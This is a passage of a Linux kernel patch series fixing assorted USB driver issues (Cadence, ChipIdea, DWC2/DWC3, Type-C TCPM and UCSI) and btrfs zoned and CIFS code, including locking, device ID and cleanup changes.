+-		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+-		if (ret == -EBUSY)
+-			ret = 0;
+-
+-		list_del(&pdev->ep0_preq.list);
+-		break;
+ 	default:
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 		break;
+@@ -474,9 +460,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ 	else
+ 		ret = cdnsp_ep0_delegate_req(pdev, ctrl);
+ 
+-	if (!len)
+-		pdev->ep0_stage = CDNSP_STATUS_STAGE;
+-
+ 	if (ret == USB_GADGET_DELAYED_STATUS) {
+ 		trace_cdnsp_ep0_status_stage("delayed");
+ 		return;
+@@ -484,6 +467,6 @@ void cdnsp_setup_analyze(struct cdnsp_device *pdev)
+ out:
+ 	if (ret < 0)
+ 		cdnsp_ep0_stall(pdev);
+-	else if (pdev->ep0_stage == CDNSP_STATUS_STAGE)
++	else if (!len && pdev->ep0_stage != CDNSP_STATUS_STAGE)
+ 		cdnsp_status_stage(pdev);
+ }
+diff --git a/drivers/usb/cdns3/cdnsp-pci.c b/drivers/usb/cdns3/cdnsp-pci.c
+index fe8a114c586cc..29f433c5a6f3f 100644
+--- a/drivers/usb/cdns3/cdnsp-pci.c
++++ b/drivers/usb/cdns3/cdnsp-pci.c
+@@ -29,30 +29,23 @@
+ #define PLAT_DRIVER_NAME	"cdns-usbssp"
+ 
+ #define CDNS_VENDOR_ID		0x17cd
+-#define CDNS_DEVICE_ID		0x0100
++#define CDNS_DEVICE_ID		0x0200
++#define CDNS_DRD_ID		0x0100
+ #define CDNS_DRD_IF		(PCI_CLASS_SERIAL_USB << 8 | 0x80)
+ 
+ static struct pci_dev *cdnsp_get_second_fun(struct pci_dev *pdev)
+ {
+-	struct pci_dev *func;
+-
+ 	/*
+ 	 * Gets the second function.
+-	 * It's little tricky, but this platform has two function.
+-	 * The fist keeps resources for Host/Device while the second
+-	 * keeps resources for DRD/OTG.
++	 * Platform has two function. The fist keeps resources for
++	 * Host/Device while the secon keeps resources for DRD/OTG.
+ 	 */
+-	func = pci_get_device(pdev->vendor, pdev->device, NULL);
+-	if (!func)
+-		return NULL;
++	if (pdev->device == CDNS_DEVICE_ID)
++		return  pci_get_device(pdev->vendor, CDNS_DRD_ID, NULL);
++	else if (pdev->device == CDNS_DRD_ID)
++		return pci_get_device(pdev->vendor, CDNS_DEVICE_ID, NULL);
+ 
+-	if (func->devfn == pdev->devfn) {
+-		func = pci_get_device(pdev->vendor, pdev->device, func);
+-		if (!func)
+-			return NULL;
+-	}
+-
+-	return func;
++	return NULL;
+ }
+ 
+ static int cdnsp_pci_probe(struct pci_dev *pdev,
+@@ -232,6 +225,8 @@ static const struct pci_device_id cdnsp_pci_ids[] = {
+ 	  PCI_CLASS_SERIAL_USB_DEVICE, PCI_ANY_ID },
+ 	{ PCI_VENDOR_ID_CDNS, CDNS_DEVICE_ID, PCI_ANY_ID, PCI_ANY_ID,
+ 	  CDNS_DRD_IF, PCI_ANY_ID },
++	{ PCI_VENDOR_ID_CDNS, CDNS_DRD_ID, PCI_ANY_ID, PCI_ANY_ID,
++	  CDNS_DRD_IF, PCI_ANY_ID },
+ 	{ 0, }
+ };
+ 
+diff --git a/drivers/usb/chipidea/ci.h b/drivers/usb/chipidea/ci.h
+index a4a3be0499109..85a803c135ab3 100644
+--- a/drivers/usb/chipidea/ci.h
++++ b/drivers/usb/chipidea/ci.h
+@@ -204,6 +204,7 @@ struct hw_bank {
+  * @in_lpm: if the core in low power mode
+  * @wakeup_int: if wakeup interrupt occur
+  * @rev: The revision number for controller
++ * @mutex: protect code from concorrent running when doing role switch
+  */
+ struct ci_hdrc {
+ 	struct device			*dev;
+@@ -256,6 +257,7 @@ struct ci_hdrc {
+ 	bool				in_lpm;
+ 	bool				wakeup_int;
+ 	enum ci_revision		rev;
++	struct mutex                    mutex;
+ };
+ 
+ static inline struct ci_role_driver *ci_role(struct ci_hdrc *ci)
+diff --git a/drivers/usb/chipidea/core.c b/drivers/usb/chipidea/core.c
+index 6330fa9117926..5abdc2b0f506d 100644
+--- a/drivers/usb/chipidea/core.c
++++ b/drivers/usb/chipidea/core.c
+@@ -977,9 +977,16 @@ static ssize_t role_store(struct device *dev,
+ 			     strlen(ci->roles[role]->name)))
+ 			break;
+ 
+-	if (role == CI_ROLE_END || role == ci->role)
++	if (role == CI_ROLE_END)
+ 		return -EINVAL;
+ 
++	mutex_lock(&ci->mutex);
++
++	if (role == ci->role) {
++		mutex_unlock(&ci->mutex);
++		return n;
++	}
++
+ 	pm_runtime_get_sync(dev);
+ 	disable_irq(ci->irq);
+ 	ci_role_stop(ci);
+@@ -988,6 +995,7 @@ static ssize_t role_store(struct device *dev,
+ 		ci_handle_vbus_change(ci);
+ 	enable_irq(ci->irq);
+ 	pm_runtime_put_sync(dev);
++	mutex_unlock(&ci->mutex);
+ 
+ 	return (ret == 0) ? n : ret;
+ }
+@@ -1023,6 +1031,7 @@ static int ci_hdrc_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	spin_lock_init(&ci->lock);
++	mutex_init(&ci->mutex);
+ 	ci->dev = dev;
+ 	ci->platdata = dev_get_platdata(dev);
+ 	ci->imx28_write_fix = !!(ci->platdata->flags &
+diff --git a/drivers/usb/chipidea/otg.c b/drivers/usb/chipidea/otg.c
+index 7b53274ef9664..10f8cc44a16db 100644
+--- a/drivers/usb/chipidea/otg.c
++++ b/drivers/usb/chipidea/otg.c
+@@ -167,8 +167,10 @@ static int hw_wait_vbus_lower_bsv(struct ci_hdrc *ci)
+ 
+ static void ci_handle_id_switch(struct ci_hdrc *ci)
+ {
+-	enum ci_role role = ci_otg_role(ci);
++	enum ci_role role;
+ 
++	mutex_lock(&ci->mutex);
++	role = ci_otg_role(ci);
+ 	if (role != ci->role) {
+ 		dev_dbg(ci->dev, "switching from %s to %s\n",
+ 			ci_role(ci)->name, ci->roles[role]->name);
+@@ -198,6 +200,7 @@ static void ci_handle_id_switch(struct ci_hdrc *ci)
+ 		if (role == CI_ROLE_GADGET)
+ 			ci_handle_vbus_change(ci);
+ 	}
++	mutex_unlock(&ci->mutex);
+ }
+ /**
+  * ci_otg_work - perform otg (vbus/id) event handle
+diff --git a/drivers/usb/dwc2/drd.c b/drivers/usb/dwc2/drd.c
+index d8d6493bc4576..a8605b02115b1 100644
+--- a/drivers/usb/dwc2/drd.c
++++ b/drivers/usb/dwc2/drd.c
+@@ -35,7 +35,8 @@ static void dwc2_ovr_init(struct dwc2_hsotg *hsotg)
+ 
+ 	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 
+-	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST));
++	dwc2_force_mode(hsotg, (hsotg->dr_mode == USB_DR_MODE_HOST) ||
++				(hsotg->role_sw_default_mode == USB_DR_MODE_HOST));
+ }
+ 
+ static int dwc2_ovr_avalid(struct dwc2_hsotg *hsotg, bool valid)
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index ec4ace0107f5f..0c02ef7628fd5 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -91,13 +91,6 @@ static int dwc2_get_dr_mode(struct dwc2_hsotg *hsotg)
+ 	return 0;
+ }
+ 
+-static void __dwc2_disable_regulators(void *data)
+-{
+-	struct dwc2_hsotg *hsotg = data;
+-
+-	regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+-}
+-
+ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ {
+ 	struct platform_device *pdev = to_platform_device(hsotg->dev);
+@@ -108,11 +101,6 @@ static int __dwc2_lowlevel_hw_enable(struct dwc2_hsotg *hsotg)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev,
+-				       __dwc2_disable_regulators, hsotg);
+-	if (ret)
+-		return ret;
+-
+ 	if (hsotg->clk) {
+ 		ret = clk_prepare_enable(hsotg->clk);
+ 		if (ret)
+@@ -168,7 +156,7 @@ static int __dwc2_lowlevel_hw_disable(struct dwc2_hsotg *hsotg)
+ 	if (hsotg->clk)
+ 		clk_disable_unprepare(hsotg->clk);
+ 
+-	return 0;
++	return regulator_bulk_disable(ARRAY_SIZE(hsotg->supplies), hsotg->supplies);
+ }
+ 
+ /**
+@@ -607,7 +595,7 @@ error_init:
+ 	if (hsotg->params.activate_stm_id_vb_detection)
+ 		regulator_disable(hsotg->usb33d);
+ error:
+-	if (hsotg->dr_mode != USB_DR_MODE_PERIPHERAL)
++	if (hsotg->ll_hw_enabled)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 	return retval;
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index df1ce96fa2281..5997d7f943fec 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -1689,6 +1689,7 @@ static int __dwc3_gadget_get_frame(struct dwc3 *dwc)
+  */
+ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool interrupt)
+ {
++	struct dwc3 *dwc = dep->dwc;
+ 	struct dwc3_gadget_ep_cmd_params params;
+ 	u32 cmd;
+ 	int ret;
+@@ -1712,10 +1713,13 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
+ 	WARN_ON_ONCE(ret);
+ 	dep->resource_index = 0;
+ 
+-	if (!interrupt)
++	if (!interrupt) {
++		if (!DWC3_IP_IS(DWC3) || DWC3_VER_IS_PRIOR(DWC3, 310A))
++			mdelay(1);
+ 		dep->flags &= ~DWC3_EP_TRANSFER_STARTED;
+-	else if (!ret)
++	} else if (!ret) {
+ 		dep->flags |= DWC3_EP_END_TRANSFER_PENDING;
++	}
+ 
+ 	dep->flags &= ~DWC3_EP_DELAY_STOP;
+ 	return ret;
+@@ -3764,7 +3768,11 @@ void dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force,
+ 	 * enabled, the EndTransfer command will have completed upon
+ 	 * returning from this function.
+ 	 *
+-	 * This mode is NOT available on the DWC_usb31 IP.
++	 * This mode is NOT available on the DWC_usb31 IP.  In this
++	 * case, if the IOC bit is not set, then delay by 1ms
++	 * after issuing the EndTransfer command.  This allows for the
++	 * controller to handle the command completely before DWC3
++	 * remove requests attempts to unmap USB request buffers.
+ 	 */
+ 
+ 	__dwc3_stop_active_transfer(dep, force, interrupt);
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index c1f62e91b0126..4a42574b4a7fe 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -1422,7 +1422,7 @@ void g_audio_cleanup(struct g_audio *g_audio)
+ 	uac = g_audio->uac;
+ 	card = uac->card;
+ 	if (card)
+-		snd_card_free(card);
++		snd_card_free_when_closed(card);
+ 
+ 	kfree(uac->p_prm.reqs);
+ 	kfree(uac->c_prm.reqs);
+diff --git a/drivers/usb/misc/onboard_usb_hub.c b/drivers/usb/misc/onboard_usb_hub.c
+index 044e75ad4d20c..832d3ba9368ff 100644
+--- a/drivers/usb/misc/onboard_usb_hub.c
++++ b/drivers/usb/misc/onboard_usb_hub.c
+@@ -406,6 +406,7 @@ static void onboard_hub_usbdev_disconnect(struct usb_device *udev)
+ 
+ static const struct usb_device_id onboard_hub_id_table[] = {
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2514) }, /* USB2514B USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2517) }, /* USB2517 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0411) }, /* RTS5411 USB 3.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x5411) }, /* RTS5411 USB 2.1 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0414) }, /* RTS5414 USB 3.2 */
+diff --git a/drivers/usb/misc/onboard_usb_hub.h b/drivers/usb/misc/onboard_usb_hub.h
+index 34beab8bce3d6..2cde54b69eede 100644
+--- a/drivers/usb/misc/onboard_usb_hub.h
++++ b/drivers/usb/misc/onboard_usb_hub.h
+@@ -24,6 +24,7 @@ static const struct onboard_hub_pdata ti_tusb8041_data = {
+ 
+ static const struct of_device_id onboard_hub_match[] = {
+ 	{ .compatible = "usb424,2514", .data = &microchip_usb424_data, },
++	{ .compatible = "usb424,2517", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb451,8140", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb451,8142", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usbbda,411", .data = &realtek_rts5411_data, },
+diff --git a/drivers/usb/storage/unusual_uas.h b/drivers/usb/storage/unusual_uas.h
+index c7b763d6d1023..1f8c9b16a0fb8 100644
+--- a/drivers/usb/storage/unusual_uas.h
++++ b/drivers/usb/storage/unusual_uas.h
+@@ -111,6 +111,13 @@ UNUSUAL_DEV(0x152d, 0x0578, 0x0000, 0x9999,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_BROKEN_FUA),
+ 
++/* Reported by: Yaroslav Furman <yaro330@gmail.com> */
++UNUSUAL_DEV(0x152d, 0x0583, 0x0000, 0x9999,
++		"JMicron",
++		"JMS583Gen 2",
++		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
++		US_FL_NO_REPORT_OPCODES),
++
+ /* Reported-by: Thinh Nguyen <thinhn@synopsys.com> */
+ UNUSUAL_DEV(0x154b, 0xf00b, 0x0000, 0x9999,
+ 		"PNY",
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 59b366b5c6144..032d21a967799 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1436,10 +1436,18 @@ static int tcpm_ams_start(struct tcpm_port *port, enum tcpm_ams ams)
+ static void tcpm_queue_vdm(struct tcpm_port *port, const u32 header,
+ 			   const u32 *data, int cnt)
+ {
++	u32 vdo_hdr = port->vdo_data[0];
++
+ 	WARN_ON(!mutex_is_locked(&port->lock));
+ 
+-	/* Make sure we are not still processing a previous VDM packet */
+-	WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	/* If is sending discover_identity, handle received message first */
++	if (PD_VDO_SVDM(vdo_hdr) && PD_VDO_CMD(vdo_hdr) == CMD_DISCOVER_IDENT) {
++		port->send_discover = true;
++		mod_send_discover_delayed_work(port, SEND_DISCOVER_RETRY_MS);
++	} else {
++		/* Make sure we are not still processing a previous VDM packet */
++		WARN_ON(port->vdm_state > VDM_STATE_DONE);
++	}
+ 
+ 	port->vdo_count = cnt + 1;
+ 	port->vdo_data[0] = header;
+@@ -1942,11 +1950,13 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			switch (PD_VDO_CMD(vdo_hdr)) {
+ 			case CMD_DISCOVER_IDENT:
+ 				res = tcpm_ams_start(port, DISCOVER_IDENTITY);
+-				if (res == 0)
++				if (res == 0) {
+ 					port->send_discover = false;
+-				else if (res == -EAGAIN)
++				} else if (res == -EAGAIN) {
++					port->vdo_data[0] = 0;
+ 					mod_send_discover_delayed_work(port,
+ 								       SEND_DISCOVER_RETRY_MS);
++				}
+ 				break;
+ 			case CMD_DISCOVER_SVID:
+ 				res = tcpm_ams_start(port, DISCOVER_SVIDS);
+@@ -2029,6 +2039,7 @@ static void vdm_run_state_machine(struct tcpm_port *port)
+ 			unsigned long timeout;
+ 
+ 			port->vdm_retries = 0;
++			port->vdo_data[0] = 0;
+ 			port->vdm_state = VDM_STATE_BUSY;
+ 			timeout = vdm_ready_timeout(vdo_hdr);
+ 			mod_vdm_delayed_work(port, timeout);
+@@ -4547,6 +4558,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		tcpm_pd_send_control(port, PD_CTRL_ACCEPT);
+ 		tcpm_ams_finish(port);
+ 		if (port->pwr_role == TYPEC_SOURCE) {
+@@ -4566,6 +4580,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 	case SOFT_RESET_SEND:
+ 		port->message_id = 0;
+ 		port->rx_msgid = -1;
++		/* remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		if (tcpm_pd_send_control(port, PD_CTRL_SOFT_RESET))
+ 			tcpm_set_state_cond(port, hard_reset_state(port), 0);
+ 		else
+@@ -4695,6 +4712,9 @@ static void run_state_machine(struct tcpm_port *port)
+ 		tcpm_set_state(port, SNK_STARTUP, 0);
+ 		break;
+ 	case PR_SWAP_SNK_SRC_SINK_OFF:
++		/* will be source, remove existing capabilities */
++		usb_power_delivery_unregister_capabilities(port->partner_source_caps);
++		port->partner_source_caps = NULL;
+ 		/*
+ 		 * Prevent vbus discharge circuit from turning on during PR_SWAP
+ 		 * as this is not a disconnect.
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 1cf8947c6d661..8cbbb002fefe0 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1205,7 +1205,7 @@ out_unlock:
+ static int ucsi_init(struct ucsi *ucsi)
+ {
+ 	struct ucsi_connector *con;
+-	u64 command;
++	u64 command, ntfy;
+ 	int ret;
+ 	int i;
+ 
+@@ -1217,8 +1217,8 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable basic notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_CMD_COMPLETE | UCSI_ENABLE_NTFY_ERROR;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_reset;
+@@ -1250,12 +1250,13 @@ static int ucsi_init(struct ucsi *ucsi)
+ 	}
+ 
+ 	/* Enable all notifications */
+-	ucsi->ntfy = UCSI_ENABLE_NTFY_ALL;
+-	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
++	ntfy = UCSI_ENABLE_NTFY_ALL;
++	command = UCSI_SET_NOTIFICATION_ENABLE | ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+ 	if (ret < 0)
+ 		goto err_unregister;
+ 
++	ucsi->ntfy = ntfy;
+ 	return 0;
+ 
+ err_unregister:
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index ce0c8ef80c043..62206a6b8ea75 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -78,7 +78,7 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 	if (ret)
+ 		goto out_clear_bit;
+ 
+-	if (!wait_for_completion_timeout(&ua->complete, HZ))
++	if (!wait_for_completion_timeout(&ua->complete, 5 * HZ))
+ 		ret = -ETIMEDOUT;
+ 
+ out_clear_bit:
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 056f002263db5..1b72004136ef8 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -2099,11 +2099,21 @@ bool btrfs_can_activate_zone(struct btrfs_fs_devices *fs_devices, u64 flags)
+ 		if (!device->bdev)
+ 			continue;
+ 
+-		if (!zinfo->max_active_zones ||
+-		    atomic_read(&zinfo->active_zones_left)) {
++		if (!zinfo->max_active_zones) {
+ 			ret = true;
+ 			break;
+ 		}
++
++		switch (flags & BTRFS_BLOCK_GROUP_PROFILE_MASK) {
++		case 0: /* single */
++			ret = (atomic_read(&zinfo->active_zones_left) >= 1);
++			break;
++		case BTRFS_BLOCK_GROUP_DUP:
++			ret = (atomic_read(&zinfo->active_zones_left) >= 2);
++			break;
++		}
++		if (ret)
++			break;
+ 	}
+ 	mutex_unlock(&fs_info->chunk_mutex);
+ 
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 75d5e06306ea5..bfc964b36c72e 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -99,6 +99,23 @@ path_to_dentry(struct cifs_sb_info *cifs_sb, const char *path)
+ 	return dentry;
+ }
+ 
++static const char *path_no_prefix(struct cifs_sb_info *cifs_sb,
++				  const char *path)
++{
++	size_t len = 0;
++
++	if (!*path)
++		return path;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++	    cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath) + 1;
++		if (unlikely(len > strlen(path)))
++			return ERR_PTR(-EINVAL);
++	}
++	return path + len;
++}
++
+ /*
+  * Open the and cache a directory handle.
+  * If error then *cfid is not initialized.
+@@ -125,6 +142,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct dentry *dentry = NULL;
+ 	struct cached_fid *cfid;
+ 	struct cached_fids *cfids;
++	const char *npath;
+ 
+ 	if (tcon == NULL || tcon->cfids == NULL || tcon->nohandlecache ||
+ 	    is_smb1_server(tcon->ses->server))
+@@ -160,6 +178,20 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		return 0;
+ 	}
+ 
++	/*
++	 * Skip any prefix paths in @path as lookup_positive_unlocked() ends up
++	 * calling ->lookup() which already adds those through
++	 * build_path_from_dentry().  Also, do it earlier as we might reconnect
++	 * below when trying to send compounded request and then potentially
++	 * having a different prefix path (e.g. after DFS failover).
++	 */
++	npath = path_no_prefix(cifs_sb, path);
++	if (IS_ERR(npath)) {
++		rc = PTR_ERR(npath);
++		kfree(utf16_path);
++		return rc;
++	}
++
+ 	/*
+ 	 * We do not hold the lock for the open because in case
+ 	 * SMB2_open needs to reconnect.
+@@ -184,6 +216,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	oparms = (struct cifs_open_parms) {
+ 		.tcon = tcon,
++		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+ 		.desired_access = FILE_READ_ATTRIBUTES,
+ 		.disposition = FILE_OPEN,
+@@ -251,10 +284,10 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 				(char *)&cfid->file_all_info))
+ 		cfid->file_all_info_is_valid = true;
+ 
+-	if (!path[0])
++	if (!npath[0])
+ 		dentry = dget(cifs_sb->root);
+ 	else {
+-		dentry = path_to_dentry(cifs_sb, path);
++		dentry = path_to_dentry(cifs_sb, npath);
+ 		if (IS_ERR(dentry)) {
+ 			rc = -ENOENT;
+ 			goto oshr_free;
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 90850da390aeb..4952a94e5272d 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -175,7 +175,7 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 
+ 	seq_puts(m, "# Version:1\n");
+ 	seq_puts(m, "# Format:\n");
+-	seq_puts(m, "# <tree id> <persistent fid> <flags> <count> <pid> <uid>");
++	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
+ #ifdef CONFIG_CIFS_DEBUG2
+ 	seq_printf(m, " <filename> <mid>\n");
+ #else
+@@ -188,8 +188,9 @@ static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
+ 				spin_lock(&tcon->open_file_lock);
+ 				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 					seq_printf(m,
+-						"0x%x 0x%llx 0x%x %d %d %d %pd",
++						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
+ 						tcon->tid,
++						ses->Suid,
+ 						cfile->fid.persistent_fid,
+ 						cfile->f_flags,
+ 						cfile->count,
+@@ -215,6 +216,7 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ {
+ 	struct mid_q_entry *mid_entry;
+ 	struct TCP_Server_Info *server;
++	struct TCP_Server_Info *chan_server;
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct cifs_server_iface *iface;
+@@ -458,23 +460,35 @@ skip_rdma:
+ 					seq_puts(m, "\t\t[CONNECTED]\n");
+ 			}
+ 			spin_unlock(&ses->iface_lock);
++
++			seq_puts(m, "\n\n\tMIDs: ");
++			spin_lock(&ses->chan_lock);
++			for (j = 0; j < ses->chan_count; j++) {
++				chan_server = ses->chans[j].server;
++				if (!chan_server)
++					continue;
++
++				if (list_empty(&chan_server->pending_mid_q))
++					continue;
++
++				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
++					   chan_server->conn_id);
++				spin_lock(&chan_server->mid_lock);
++				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
++					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
++						   mid_entry->mid_state,
++						   le16_to_cpu(mid_entry->command),
++						   mid_entry->pid,
++						   mid_entry->callback_data,
++						   mid_entry->mid);
++				}
++				spin_unlock(&chan_server->mid_lock);
++			}
++			spin_unlock(&ses->chan_lock);
++			seq_puts(m, "\n--\n");
+ 		}
+ 		if (i == 0)
+ 			seq_printf(m, "\n\t\t[NONE]");
+-
+-		seq_puts(m, "\n\n\tMIDs: ");
+-		spin_lock(&server->mid_lock);
+-		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-			seq_printf(m, "\n\tState: %d com: %d pid:"
+-					" %d cbdata: %p mid %llu\n",
+-					mid_entry->mid_state,
+-					le16_to_cpu(mid_entry->command),
+-					mid_entry->pid,
+-					mid_entry->callback_data,
+-					mid_entry->mid);
+-		}
+-		spin_unlock(&server->mid_lock);
+-		seq_printf(m, "\n--\n");
+ 	}
+ 	if (c == 0)
+ 		seq_printf(m, "\n\t[NONE]");
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+index 6094cb2ff099b..03e3e95cf25b2 100644
+--- a/fs/cifs/cifsfs.c
++++ b/fs/cifs/cifsfs.c
+@@ -730,13 +730,16 @@ static void cifs_umount_begin(struct super_block *sb)
+ 	spin_lock(&tcon->tc_lock);
+ 	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
+ 		/* we have other mounts to same share or we have
+-		   already tried to force umount this and woken up
++		   already tried to umount this and woken up
+ 		   all waiting network requests, nothing to do */
+ 		spin_unlock(&tcon->tc_lock);
+ 		spin_unlock(&cifs_tcp_ses_lock);
+ 		return;
+-	} else if (tcon->tc_count == 1)
+-		tcon->status = TID_EXITING;
++	}
++	/*
++	 * can not set tcon->status to TID_EXITING yet since we don't know if umount -f will
++	 * fail later (e.g. due to open files).  TID_EXITING will be set just before tdis req sent
++	 */
+ 	spin_unlock(&tcon->tc_lock);
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ 
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 6b8f59912f705..6c6a7fc47f3e3 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -85,13 +85,11 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 
+ 	/*
+ 	 * only tree disconnect, open, and write, (and ulogoff which does not
+-	 * have tcon) are allowed as we start force umount
++	 * have tcon) are allowed as we start umount
+ 	 */
+ 	spin_lock(&tcon->tc_lock);
+ 	if (tcon->status == TID_EXITING) {
+-		if (smb_command != SMB_COM_WRITE_ANDX &&
+-		    smb_command != SMB_COM_OPEN_ANDX &&
+-		    smb_command != SMB_COM_TREE_DISCONNECT) {
++		if (smb_command != SMB_COM_TREE_DISCONNECT) {
+ 			spin_unlock(&tcon->tc_lock);
+ 			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+ 				 smb_command);
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 0006b1ca02036..7aecb1646b6fc 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -1774,7 +1774,7 @@ out_err:
+ 	return ERR_PTR(rc);
+ }
+ 
+-/* this function must be called with ses_lock held */
++/* this function must be called with ses_lock and chan_lock held */
+ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ {
+ 	if (ctx->sectype != Unspecified &&
+@@ -1785,12 +1785,8 @@ static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	 * If an existing session is limited to less channels than
+ 	 * requested, it should not be reused
+ 	 */
+-	spin_lock(&ses->chan_lock);
+-	if (ses->chan_max < ctx->max_channels) {
+-		spin_unlock(&ses->chan_lock);
++	if (ses->chan_max < ctx->max_channels)
+ 		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+ 
+ 	switch (ses->sectype) {
+ 	case Kerberos:
+@@ -1918,10 +1914,13 @@ cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_lock(&ses->chan_lock);
+ 		if (!match_session(ses, ctx)) {
++			spin_unlock(&ses->chan_lock);
+ 			spin_unlock(&ses->ses_lock);
+ 			continue;
+ 		}
++		spin_unlock(&ses->chan_lock);
